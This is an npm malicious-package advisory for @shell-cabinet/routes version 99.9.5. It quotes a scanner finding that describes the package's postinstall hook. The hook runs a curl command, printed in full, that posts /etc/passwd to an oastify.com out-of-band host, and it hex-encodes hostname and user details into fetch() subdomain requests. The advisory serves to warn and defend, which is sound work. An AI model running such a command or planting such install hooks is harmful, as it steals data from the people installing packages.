VYPR

npm · Malicious package advisory

Malware

@shell-cabinet/routes

MAL-2026-5428

Malicious code in @shell-cabinet/routes (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad)
On `npm install`, the package's postinstall hook runs `curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com`, posting the installer's /etc/passwd to a hostname-prefixed subdomain of oastify.com (a Burp Collaborator out-of-band channel). The same postinstall first executes `scripts/scream3gg.js`, which hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username` and issues plain-HTTP fetch() requests with the hex chunked into subdomains of `nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com`, leaking host identifiers over DNS-encoded HTTP. Both behaviors fire unconditionally at install time and have no relationship to any documented package functionality.

Compromised versions (1)

  • 99.9.5

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.